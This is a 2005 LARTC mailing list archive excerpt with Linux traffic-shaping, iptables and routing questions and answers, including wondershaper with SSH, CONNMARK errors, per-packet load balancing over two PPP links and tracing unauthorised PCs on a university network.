network eth0 My problem is, that i can not shape my VPN (PPTP) connections. At least at the same interface (eth0) as the other, normal connections. I tried a few configurations, but nothing seemed to work. Maybe i should shape them at the pppx interfaces? But I can not attach one HTB class for multiple interfaces. Can IMQ (http://www.linuximq.net/) solve my problems? Can you give me some advice? Thanks! Nandor From cs83152@csie.chu.edu.tw Mon Jan 10 02:25:56 2005 From: cs83152@csie.chu.edu.tw (Vincent) Date: Mon, 10 Jan 2005 10:25:56 +0800 Subject: [LARTC] CONNMARK problem In-Reply-To: <41DFD9F4.6020408@ig.com.br> Message-ID: <002e01c4f6bb$bbeb8c30$aa0ba8c0@l7.com.tw> > -----Original Message----- > From: lartc-admin@mailman.ds9a.nl > [mailto:lartc-admin@mailman.ds9a.nl] On Behalf Of Leandro Travaglia > Sent: Saturday, January 08, 2005 9:03 PM > To: LARTC > Subject: [LARTC] CONNMARK problem > > > Hi all, > > I have IPTABLES 1.2.10 and i have a weird problem with CONNMARK > > When i run: > # iptables -v -t mangle -F > # iptables -v -t mangle -A PREROUTING -p tcp -j CONNMARK > --restore-mark CONNMARK tcp opt -- in * out * 0.0.0.0/0 -> > 0.0.0.0/0 CONNMARK restore > iptables: No chain/target/match by that name Make sure that CONNMARK target is vaild in mangle table > PREROUTING chain. Or you can try to inspect the rule in another table/chain Another possible is the target format. You can try to use a simple target to verify if the target format is correct or not. Vincent > > Why is that happening?? > > The command: > # iptables -v -j CONNMARK -h > returns: > CONNMARK target v1.2.10 options: > --set-mark value[/mask] Set conntrack mark value > --save-mark [--mask mask] Save the packet nfmark in the > connection > --restore-mark [--mask mask] Restore saved nfmark value > > So everything seens fine to me........ > > Thanks... > > > -- > No virus found in this outgoing message. > Checked by AVG Anti-Virus. > Version: 7.0.300 / Virus Database: 265.6.9 - Release Date: 6/1/2005 > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From cs83152@csie.chu.edu.tw Mon Jan 10 02:48:51 2005 From: cs83152@csie.chu.edu.tw (Vincent) Date: Mon, 10 Jan 2005 10:48:51 +0800 Subject: [LARTC] Tools to get current bandwidth of queue or speed rate? In-Reply-To: <002e01c4f6bb$bbeb8c30$aa0ba8c0@l7.com.tw> Message-ID: Hello, Does there exist any tool that can report the current bandwidth information that is managed by tc(traffic control) tool. I can use the tool to get the current(or accumulated) bandwidth used by each tc queue. Thanks for your assist Vincent From Alf.Vahau@upng.ac.pg Mon Jan 10 03:22:44 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Mon, 10 Jan 2005 13:22:44 +1000 Subject: [LARTC] Personal Firewalls Message-ID: <41E1F504.2010201@upng.ac.pg> Hello, Our ISP provides a firewall and NAT services for our Intranet. However, within the Intranet, there appear to be personal firewalls around some anonymous PCs. The IP addresses of these PCs can be detected by our network monitoring tool. The identity of the user however remains anonymous. Are there any tools that can be used to penetrate the personal firewall and reveal the identity of the users? All our IP addresses fall within specific ranges and the existence of these addresses are against the policies on computer usage. Thanks for any pointers, Alfred Vahau IT Services Uni. PNG -- From shurdeek@routehat.org Mon Jan 10 09:39:26 2005 From: shurdeek@routehat.org (Peter Surda) Date: Mon, 10 Jan 2005 10:39:26 +0100 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E1F504.2010201@upng.ac.pg> References: <41E1F504.2010201@upng.ac.pg> Message-ID: <41E24D4E.8090409@routehat.org> Alfred Vahau wrote: > All our IP addresses fall within > specific ranges and the existence of these addresses are against the > policies on computer usage. In that case it's easy. Block their network access on the router and wait until they contact you :-) > Alfred Vahau > IT Services > Uni. PNG Yours sincerely Peter Surda From fwang@ust.hk Mon Jan 10 15:27:16 2005 From: fwang@ust.hk (Wang Feng) Date: Mon, 10 Jan 2005 23:27:16 +0800 Subject: [LARTC] Could anyone explain the slot and bucket concept in SFQ to me? Message-ID: <200501101527.j0AFRG77008922@mx4.ust.hk> Dear all, I'm reading codes in sch_sqf.c in kernel 2.4 of Linux. I find I messed up with the concept of slot, bucket and hash tables. Could anyone explain the data stucture of the hash tables a little to me. Thanks very much. Best, Franklin BTW: I can not understand why the number of entries of dep[SFQ_DEPTH*] should be twice:( From Yaman Saqqa Mon Jan 10 17:49:21 2005 From: Yaman Saqqa (Yaman Saqqa) Date: Mon, 10 Jan 2005 19:49:21 +0200 Subject: [LARTC] failover strategies - failing open vs. failing closed. In-Reply-To: <41DDB8CA.2050000@mercs.homeip.net> References: <292B2D5F863ED611BB8B0008021089550315970E@aux.uwm.edu> <41DDB8CA.2050000@mercs.homeip.net> Message-ID: <33bf452f05011009493fe96ec0@mail.gmail.com> OK ... what about syncing connection tracking state tables between the two routers/fw's, is the ct_sync code from netfilter stable .. has any one used it on a production environment .. the netfilter-failover mailing list is pretty dead ! On Thu, 06 Jan 2005 22:16:42 +0000, Jose Luis Araujo wrote: > Hi. >=20 > Sorry for the delay. Hope you are still interested in the idea. >=20 > Kelly Jeglum wrote: >=20 > >I'd like to setup a box with 2 NICs as a firewall which will also rate > >limits outbound traffic. What happens when/if that box hangs or is > >rebooted? > > > > > If you are doing NAT or routing, the you need to use VRRPD with two > machines. >=20 > >I'd like a solution that when there is a failure, traffic can still go > >through the box even though the firewall and rate limiting functions wil= l no > >longer be in effect. > > > > > If on the other hand you want just the rate limiting, then you can try > something. It only has a drawback, the switch that you will use must > have Vlan and STP. >=20 > The trick is this, you choose three ports, and assign those to, say vlan > 2, then choose another 3 ports and assign those to vlan 3. >=20 > Enable STP on both Vlan's, increase the portcost on one port on each > Vlan, and use a crossed cable to link them. > Connect a port from each Vlan to the bridge/rate limiter. > Connect the remaining port to your inner router, and to your outer router= . >=20 > Now, the idea is, the Vlan will divide the switch virtually, traffic > from vlan 2 won't go to vlan 3, only if they are physically connected, > they behave like two switches (witch will also work, provided that the > switches permit VTP). When everything is working properly, the switch > will see two links from vlan 2 to vlan 3 and will disable the one with > the higher cost (the cross cable), then all your traffic will flow > thought the bridge. > If the bridge stops,hangs is disconnected, the switch will only see one > link (the cross cable) and will enable it, bypassing the bridge. >=20 > I have this setup in operation now, and it works great. >=20 > For those wondering, it is using a cisco 2900XL and the fallback time is > from 30 to 50 seconds. >=20 > Hope it helps >=20 > Jos=E9 Ara=FAjo >=20 > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >=20 --=20 abulyomon www.KiLLTHeUPLiNK.com From Alf.Vahau@upng.ac.pg Mon Jan 10 18:33:33 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Tue, 11 Jan 2005 04:33:33 +1000 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E24D4E.8090409@routehat.org> References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> Message-ID: <41E2CA7D.8080504@upng.ac.pg> Thanks for the reply. This is the practice at present. We block off one IP and another pops up. At times, quite a few of them appear. We suspect that some of these guys are disgruntled ex-employees who have unauthorized access or are accessing the network with the help of other staff. alfred, Peter Surda wrote: > Alfred Vahau wrote: > >> All our IP addresses fall within >> specific ranges and the existence of these addresses are against the >> policies on computer usage. > > > In that case it's easy. Block their network access on the router and > wait until they contact you :-) > >> Alfred Vahau >> IT Services >> Uni. PNG > > > Yours sincerely > Peter Surda > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ -- From lists@llondel.org Mon Jan 10 18:47:32 2005 From: lists@llondel.org (David Hough) Date: Mon, 10 Jan 2005 18:47:32 +0000 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E2CA7D.8080504@upng.ac.pg> References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> Message-ID: <1105382852.2452.2.camel@robinton.llondel.org> On Mon, 2005-01-10 at 18:33, Alfred Vahau wrote: > Thanks for the reply. This is the practice at present. We block off one > IP and another pops up. > At times, quite a few of them appear. We suspect that some of these guys > are disgruntled ex-employees > who have unauthorized access or are accessing the network with the help > of other staff. It sounds as though you need a script tied in with your DHCP server so that only recognised MAC addresses get given IP addresses and only those addresses currently allocated get access via the firewall. -- Dave So many gadgets, so little time http://www.llondel.org/ From vicky.rode@gmail.com Mon Jan 10 19:19:56 2005 From: vicky.rode@gmail.com (Vicky Rode) Date: Mon, 10 Jan 2005 11:19:56 -0800 Subject: [LARTC] Bandwidth Management Tools - yet another tool Message-ID: <41E2D55C.8000807@gmail.com> hi there, has anyone used this tool? if so any thoughts? http://bwm-tools.lbsd.net/ regards, /vicky From shurdeek@routehat.org Mon Jan 10 19:47:44 2005 From: shurdeek@routehat.org (Peter Surda) Date: Mon, 10 Jan 2005 20:47:44 +0100 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E2CA7D.8080504@upng.ac.pg> References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> Message-ID: <41E2DBE0.7070403@routehat.org> Alfred Vahau wrote: > Thanks for the reply. This is the practice at present. We block off > one IP and another pops up. > At times, quite a few of them appear. We suspect that some of these > guys are disgruntled ex-employees > who have unauthorized access or are accessing the network with the > help of other staff. Aha, so you suspect malicious intent and not only accidental behaviour. In that case you shouldn't expect that some other internal information found on the problematic computers is valid either. However, there is a possibility if you want to find the computer by IP, if you use manageable switches. As you know which IPs are improper, you can also find the corresponding MAC address passively from the router's ARP table (or actively by arping), and the switches will be able to tell you on which port this MAC is plugged. Then you can e.g. shutdown the port or follow the cable to the physical computer location. > alfred, Yours sincerely Peter Surda From thefirstofthechildren@yahoo.ca Mon Jan 10 19:49:05 2005 From: thefirstofthechildren@yahoo.ca (simms) Date: Mon, 10 Jan 2005 14:49:05 -0500 Subject: [LARTC] wondershaper with ssh on a non-standard port Message-ID: <20050110194905.GM13970@queeg> --MnLPg7ZWsaic7Fhd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable greetings all,=20 i've searched high and low for this, but can't seem to find an answer=20 anywhere..=20 having read the docs and the wondershaper script itself, it occurred to=20 me that the documentation promises an immediate drop in interactive app=20 latency, specifically mentioning SSH as a big winner.=20 however, looking through the script i can't really tell just *how*=20 wondershaper figures out which port my SSH daemon is running on.=20 so what i'd like to know is, if i'm running my sshd on, say, port 222,=20 do i need to make any changes to the wondershaper script, or will it=20 figure out the right number automagically (e.g. from /etc/services,=20 where SSH is already correctly assigned to port 222) ? (conversely, does it 'need' to figure out this port number at all?) i ask because while ping time latency has indeed fallen for me since=20 wondershaper was installed, my custom-port SSH connections are as slow=20 as ever, especially during large file uploads..=20 my setup in a nutshell: - current Debian GNU/Linux 'testing' distribution ('sarge', updated daily) - kernel 2.4.27 (Debian 'testing' default, not customized) - wondershaper (v. 1.1a) (from current Debian 'testing') - Shorewall (v. 2.0.13) also from 'testing' - 4 Mbit ADSL link via 'modem' on eth0 thank you in advance! -p --=20 If economists were doctors, they would today be mired in malpractice suits. - John Ralston Saul --MnLPg7ZWsaic7Fhd Content-Type: application/pgp-signature; name="signature.asc" Content-Description: Digital signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: http://www.gnupg.org iD8DBQFB4twxDCKFvpZK6O4RAnx9AJ4/4rP3i/HV8S7qqYa3cae+vK6EIQCgjbPl SECaWZMDrIxd/fdL8xYgZ2g= =rE5R -----END PGP SIGNATURE----- --MnLPg7ZWsaic7Fhd-- From lists@wildgooses.com Mon Jan 10 22:16:02 2005 From: lists@wildgooses.com (Ed Wildgoose) Date: Mon, 10 Jan 2005 22:16:02 +0000 Subject: [LARTC] wondershaper with ssh on a non-standard port In-Reply-To: <20050110194905.GM13970@queeg> References: <20050110194905.GM13970@queeg> Message-ID: <41E2FEA2.2090208@wildgooses.com> Hi, >having read the docs and the wondershaper script itself, it occurred to >me that the documentation promises an immediate drop in interactive app >latency, specifically mentioning SSH as a big winner. >however, looking through the script i can't really tell just *how* >wondershaper figures out which port my SSH daemon is running on. > >so what i'd like to know is, if i'm running my sshd on, say, port 222, >do i need to make any changes to the wondershaper script, or will it >figure out the right number automagically (e.g. from /etc/services, >where SSH is already correctly assigned to port 222) ? >(conversely, does it 'need' to figure out this port number at all?) > > It's been a while since I looked through wondershaper, but the relevant lines are apparently these: # TOS Minimum Delay (ssh, NOT scp) in 1:10: tc filter add dev $DEV parent 1:0 protocol ip prio 10 u32 \ match ip tos 0x10 0xff flowid 1:10 So it seems to be matching based on the "type of service" bits in the IP packet. I seem to remember that SSH actually sets the IP tos bits correctly? So it *should* work when ssh is on another port. I guess you need to either tweak the script (if you want a quick fix then just mark anything to/from port 222 as high priority), or else figure out why your packets aren't matching the required rule.... Good luck Ed W From junk@maild.mine.nu Tue Jan 11 00:28:33 2005 From: junk@maild.mine.nu (junk@maild.mine.nu) Date: Tue, 11 Jan 2005 02:28:33 +0200 (IST) Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. Message-ID: <1483.192.168.1.2.1105403313@maild.mine.nu> I am still looking for a solution to this problem....... > junk@maild.mine.nu wrote: >> Hi, >> Yes i did give this a try a couple of times before with no success >> >> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK >> --set-mark 0x2 >> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK >> --set-mark 0x1 >> >> ip rule : >> 0: from all lookup local >> 201: from all fwmark 0x2 lookup 202 >> 201: from all fwmark 0x1 lookup 201 >> 32766: from all lookup main >> ip route show table 202 >> default via 212.199.28.244 dev ppp1 proto static src 80.178.89.120 >> ip route show table 201 >> default via 212.199.26.111 dev ppp0 proto static src 84.94.148.214 >> ip route show table main >> 212.199.26.111 dev ppp0 proto kernel scope link src 84.94.148.214 >> 212.199.28.244 dev ppp1 proto kernel scope link src 80.178.89.120 >> default proto static equalize >> nexthop via 212.199.26.111 dev ppp0 weight 1 >> nexthop via 212.199.28.244 dev ppp1 weight 1 > > > > I must admit I am more into tc than ip so I've never tried it. > > My guess is that you need to get rid of equalize/weights as these load > balance per connection and the routes get cached. > > Andy. > > how to use iproute/iptables to balance by packet OUTBOUND traffic between 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP . also by using the fact that the ISP dosen't filter source IP address - meaning i can use either PPP's link assigned IP address as the source IP in the ip header.., it works for both devices.., what i want to achive is : when uploading a large file , i could use both devices to shoot data but bound only to one source IP. Naturally i could expect all data to go back through the device with that corresponding IP , atleast that is what happens according to ethereal how to use iproute/iptables to balance by packet OUTBOUND traffic between 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP . also by using the fact that the ISP dosen't filter source IP address - meaning i can use either PPP's link assigned IP address as the source IP in the ip header.., it works for both devices.., what i want to achive is : when uploading a large file , i could use both devices to shoot data but bound only to one source IP. Naturally i could expect all data to go back through the device with that corresponding IP , atleast that is what happens according to ethereal From gypsy@iswest.com Tue Jan 11 02:31:57 2005 From: gypsy@iswest.com (gypsy) Date: Mon, 10 Jan 2005 18:31:57 -0800 Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. References: <1483.192.168.1.2.1105403313@maild.mine.nu> Message-ID: <41E33A9D.99998441@iswest.com> junk@maild.mine.nu wrote: > > I am still looking for a solution to this problem....... > > junk@maild.mine.nu wrote: I realize this is the opposite of what you try to accomplish, but perhaps it will help? Google "LARTC load balance a file download across two connections - success" gypsy From sandeep@netcontinuum.com Tue Jan 11 07:32:55 2005 From: sandeep@netcontinuum.com (Sandeep A.S) Date: Tue, 11 Jan 2005 13:02:55 +0530 Subject: [LARTC] Openvpn &LARTC Message-ID: <1105428775.3720.5.camel@sandeep> I have to do Load balancing and Qos on a Linux box which is having openvpn and iptables running System is Fedora core 1 Any known issues ? Or anything I have to take care ? Thanks -- Sandeep A.S Netcontinuum Pvt Ltd From junk@maild.mine.nu Tue Jan 11 10:02:32 2005 From: junk@maild.mine.nu (junk@maild.mine.nu) Date: Tue, 11 Jan 2005 12:02:32 +0200 (IST) Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. Message-ID: <1275.192.168.1.2.1105437752@maild.mine.nu> Hey thanks for replying , i got this from ethereal ..: tethereal -i ppp0 Capturing on ppp0 0.000000 80.178.69.24 -> 67.15.162.64 TCP 31604 > 53880 [ACK] Seq=0 Ack=0 Win=5680 Len=1360 0.201730 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=2720 Ack=0 Win=5680 Len=1360 0.301142 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [PSH, ACK] Seq=5440 Ack=0 Win=5680 Len=1360 0.417813 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=8160 Ack=0 Win=5680 Len=1360 0.516307 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=10880 Ack=0 Win=5680 Len=1360 0.599234 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=13600 Ack=0 Win=5680 Len=1360 0.647668 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=16320 Ack=0 Win=5680 Len=1360 0.699314 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] .... tethereal -i ppp1 Capturing on ppp1 0.000000 67.15.162.64 -> 80.178.69.24 TCP 53880 > 31604 [ACK] Seq=0 Ack=0 Win=44880 Len=0 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487 SLE=3113996407 SRE=3113997767 SLE=3113993687 SRE=3113995047 0.008278 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [PSH, ACK] Seq=43520 Ack=0 Win=5680 Len=1360 0.014025 67.15.162.64 -> 80.178.69.24 TCP [TCP Dup ACK 1#1] 53880 > 31604 [ACK] Seq=0 Ack=0 Win=46240 Len=0 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487 SLE=3113996407 SRE=3113997767 0.091375 67.15.162.64 -> 80.178.69.24 TCP [TCP Dup ACK 1#2] 53880 > 31604 [ACK] Seq=0 Ack=0 Win=46240 Len=0 SLE=3114007287 SRE=3114008647 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487 0.098127 67.15.162.64 -> 80.178.69.24 TCP 53880 > 31604 [ACK] Seq=0 Ack=2720 Win=43520 Len=0 SLE=3114007287 SRE=3114008647 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487 0.175701 67.15.162.64 -> 80.178.69.24 TCP [TCP Dup ACK 5#1] 53880 > 31604 [ACK] Seq=0 Ack=2720 Win=44880 Len=0 SLE=3114010007 SRE=3114011367 SLE=3114007287 SRE=3114008647 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207 0.175892 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=46240 Ack=0 Win=5680 Len=1360 ..... Combine nth match with ROUTE target and you will get it. ip ro re default dev ppp0 iptables -A POSTROUTING -t mangle -o ppp+ -m nth --every 2 --packet 0 -j ROUTE --oif ppp0 iptables -A POSTROUTING -t mangle -o ppp+ -m nth --every 2 --packet 1 -j ROUTE --oif ppp1 iptables -A POSTROUTING -t nat -o ppp+ -j SNAT --to $ppp0_ip_addr I just guess that it'll work, I don't have IP spoofing enabled lines to test I am still looking for a solution to this problem....... > junk@maild.mine.nu wrote: >> Hi, >> Yes i did give this a try a couple of times before with no success >> >> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK >> --set-mark 0x2 >> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK >> --set-mark 0x1 >> >> ip rule : >> 0: from all lookup local >> 201: from all fwmark 0x2 lookup 202 >> 201: from all fwmark 0x1 lookup 201 >> 32766: from all lookup main >> ip route show table 202 >> default via 212.199.28.244 dev ppp1 proto static src 80.178.89.120 ip route show table 201 >> default via 212.199.26.111 dev ppp0 proto static src 84.94.148.214 ip route show table main >> 212.199.26.111 dev ppp0 proto kernel scope link src 84.94.148.214 212.199.28.244 dev ppp1 proto kernel scope link src 80.178.89.120 default proto static equalize >> nexthop via 212.199.26.111 dev ppp0 weight 1 >> nexthop via 212.199.28.244 dev ppp1 weight 1 > > > > I must admit I am more into tc than ip so I've never tried it. > > My guess is that you need to get rid of equalize/weights as these load balance per connection and the routes get cached. > > Andy. > > how to use iproute/iptables to balance by packet OUTBOUND traffic between 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP . also by using the fact that the ISP dosen't filter source IP address - meaning i can use either PPP's link assigned IP address as the source IP in the ip header.., it works for both devices.., what i want to achive is : when uploading a large file , i could use both devices to shoot data but bound only to one source IP. Naturally i could expect all data to go back through the device with that corresponding IP , atleast that is what happens according to ethereal From sanjeev_ravindran@linuxmail.org Tue Jan 11 11:21:15 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Tue, 11 Jan 2005 19:21:15 +0800 Subject: [LARTC] Need help regarding TBF Token rate setting Message-ID: <20050111112116.0AB253982EF@ws5-1.us4.outblaze.com> Hi,=20 I would like to know how to specify the token rate when a tbf qdic is creat= ed using tc tool.. Will it be=20 a default value when tbf qdisc is created?=20 This could be a silly question.... im quite new to all these stuff.. but im= really interested.. any help will be most appreciated... thanks in advance, sanjeev --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From jayesh@bol.co.tz Tue Jan 11 12:21:56 2005 From: jayesh@bol.co.tz (jayesh) Date: Tue, 11 Jan 2005 15:21:56 +0300 Subject: [LARTC] script Message-ID: <001301c4f7d8$24796a70$fd00000a@jayesh> This is a multi-part message in MIME format. ------=_NextPart_000_0010_01C4F7F1.49C1E780 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable please could any one help me with a sample script to limit the uplink=20 iam using eth1 to conect the internet 256 kbps and eth0 64 kbps for down = load i would like to limit bandwidth for kaaza etc=20 regards sunil Dealing in Computers, Software and Peripherals=20 =20 Jayesh Chandran Compucat Technologies (An associate of Milan Cable Television) 1.Goliondoi Road, Arusha. 2.Ground Floor, Serengeti Wing, PB No. 10367, AICC, Arusha, Tanzania =20 jayesh@bol.co.tz tel:=20 fax:=20 mobile: +255 27 2502660 +255 27 2504527 +255 748 586169 =20 =20 =20 =20 =20 Add me to your address book... Want a signature like this?=20 =20 ------=_NextPart_000_0010_01C4F7F1.49C1E780 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
please could any one help me with a = sample script=20 to limit the uplink
iam using eth1 to conect the internet = 256 kbps and=20 eth0 64 kbps for down load i would like to limit bandwidth for kaaza etc =
regards
sunil
Dealing in Computers, Software and=20 Peripherals
Jayesh Chandran Compucat Technologies
(An=20 associate of Milan Cable = Television)
1.Goliondoi=20 Road, Arusha.
2.Ground Floor, Serengeti = Wing,
PB=20 No. 10367, AICC, Arusha, Tanzania
jayesh@bol.co.tz
tel: =
fax:=20
mobile: 		+255 27 2502660
+255 27=20 2504527
+255 748 586169=20 =
Add me to your address = book... Want a signature like=20 = this?
------=_NextPart_000_0010_01C4F7F1.49C1E780-- From dseshadri@broadbandmaritime.com Tue Jan 11 14:03:09 2005 From: dseshadri@broadbandmaritime.com (Deepak Seshadri) Date: Tue, 11 Jan 2005 09:03:09 -0500 Subject: [LARTC] script References: <001301c4f7d8$24796a70$fd00000a@jayesh> Message-ID: <009001c4f7e6$483ef200$0500a8c0@floydian> Hello, Could you give me some more information about your network setup? which is your LAN interface? Which is your WAN interface? Deepak Seshadri ----- Original Message ----- From: "jayesh" To: Sent: Tuesday, January 11, 2005 7:21 AM Subject: [LARTC] script please could any one help me with a sample script to limit the uplink iam using eth1 to conect the internet 256 kbps and eth0 64 kbps for down load i would like to limit bandwidth for kaaza etc regards sunil From Alf.Vahau@upng.ac.pg Tue Jan 11 14:28:59 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Wed, 12 Jan 2005 00:28:59 +1000 Subject: [LARTC] Personal Firewalls In-Reply-To: <1105382852.2452.2.camel@robinton.llondel.org> References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> <1105382852.2452.2.camel@robinton.llondel.org> Message-ID: <41E3E2AB.3020905@upng.ac.pg> We don't use a DHCP server but maybe it's an option that needs to be looked into. Alfred, Alfred, David Hough wrote: >On Mon, 2005-01-10 at 18:33, Alfred Vahau wrote: > > >>Thanks for the reply. This is the practice at present. We block off one >>IP and another pops up. >>At times, quite a few of them appear. We suspect that some of these guys >>are disgruntled ex-employees >>who have unauthorized access or are accessing the network with the help >>of other staff. >> >> > >It sounds as though you need a script tied in with your DHCP server so >that only recognised MAC addresses get given IP addresses and only those >addresses currently allocated get access via the firewall. > > -- From Alf.Vahau@upng.ac.pg Tue Jan 11 14:39:41 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Wed, 12 Jan 2005 00:39:41 +1000 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E2DBE0.7070403@routehat.org> References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> <41E2DBE0.7070403@routehat.org> Message-ID: <41E3E52D.2050808@upng.ac.pg> Peter Surda wrote: > Alfred Vahau wrote: > >> Thanks for the reply. This is the practice at present. We block off >> one IP and another pops up. >> At times, quite a few of them appear. We suspect that some of these >> guys are disgruntled ex-employees >> who have unauthorized access or are accessing the network with the >> help of other staff. > > > Aha, so you suspect malicious intent and not only accidental > behaviour. In that case you shouldn't expect that some other internal > information found on the problematic computers is valid either. We have not dismissed malicious intent. However, the chances of it happening is quite remote. Rather the fight is against network abuse. In line with the core objectives of our institution, there are sites which are defined as unproductive. It is the access to these sites for which strange ip addresses spring up, some of which are within our IP range, for which the logs do not provide very much information on the identify of the user. > > However, there is a possibility if you want to find the computer by > IP, if you use manageable switches. As you know which IPs are > improper, you can also find the corresponding MAC address passively > from the router's ARP table (or actively by arping), and the switches > will be able to tell you on which port this MAC is plugged. Then you > can e.g. shutdown the port or follow the cable to the physical > computer location. > Thanks for this pointer. This option looks viable and will pursue this. >> alfred, > > > Yours sincerely > Peter Surda alfred, > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ -- Perl is my reason for following the Sun; From Alf.Vahau@upng.ac.pg Tue Jan 11 14:42:41 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Wed, 12 Jan 2005 00:42:41 +1000 Subject: [LARTC] Personal Firewalls In-Reply-To: References: Message-ID: <41E3E5E1.2080200@upng.ac.pg> Thank you for these pointers. These options will be explored. alfred, khurram sohaib wrote: > You can use Iptraf to monitor traffic, for further restrictions you > can use dhcp with mac address and add those address in your forward, > filter options in Iptables. this will solve your problem. > > if you need the further help for this, please let me know. > > khurram > > > > > > > > > Message FROM KHURRAM SOHAIB. >From: Alfred Vahau > >To: lartc@mailman.ds9a.nl >Subject: [LARTC] > Personal Firewalls >Date: Mon, 10 Jan 2005 13:22:44 +1000 > >Hello, > >Our ISP provides a firewall and NAT services for our Intranet. > >However, within the Intranet, there appear to be personal firewalls > >around some anonymous PCs. The IP addresses of these PCs can >be > detected by our network monitoring tool. > >The identity of the user > however remains anonymous. > >Are there any tools that can be used to > penetrate the personal >firewall >and reveal the identity of the > users? All our IP addresses fall >within >specific ranges and the > existence of these addresses are against the >policies on computer > usage. > >Thanks for any pointers, > >Alfred Vahau >IT Services >Uni. > PNG > > > > > >-- > > >_______________________________________________ > >LARTC mailing list / LARTC@mailman.ds9a.nl > >http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: >http://lartc.org/ -- Perl is my reason for following the Sun; From thefirstofthechildren@yahoo.ca Tue Jan 11 14:42:39 2005 From: thefirstofthechildren@yahoo.ca (simms) Date: Tue, 11 Jan 2005 09:42:39 -0500 Subject: [LARTC] wondershaper with ssh on a non-standard port In-Reply-To: <41E2FEA2.2090208@wildgooses.com> References: <20050110194905.GM13970@queeg> <41E2FEA2.2090208@wildgooses.com> Message-ID: <20050111144239.GA26124@queeg> --r5Pyd7+fXNt84Ff3 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable mornin' all, i still haven't found the right solution for my situation, but after=20 some digging, i realized that the free PuTTY SSH client (commonly used=20 to access remote systems from under Windows) does NOT set the TOS bit=20 in a way that would let the default wondershaper script identify its=20 packets as high-priority. =20 this means that -- as suggested by Ed -- prioritizing SSH packets in the=20 uplink stream would have to be done on the basis of the port number used=20 by these packets. =20 also, because PuTTY does not set the TOS bit as wondershaper expects,=20 PuTTY users will have to use *port-based* prioritization in wondershaper=20 EVEN IF THEIR SSH SERVER RUNS ON THE DEFAULT PORT (22).=20 i will post up my solution as soon as i get it working. in the=20 meantime, please feel free to correct me if i'm wrong / suggest other=20 solutions.=20 peace -p --=20 Until lions have their historians, tales of the hunt shall always glorify the hunters. - African Proverb=20 On Mon, 10-Jan-2005 at 22:16:02 +0000, Ed Wildgoose wrote: > Hi, >=20 > >having read the docs and the wondershaper script itself, it occurred to= =20 > >me that the documentation promises an immediate drop in interactive app= =20 > >latency, specifically 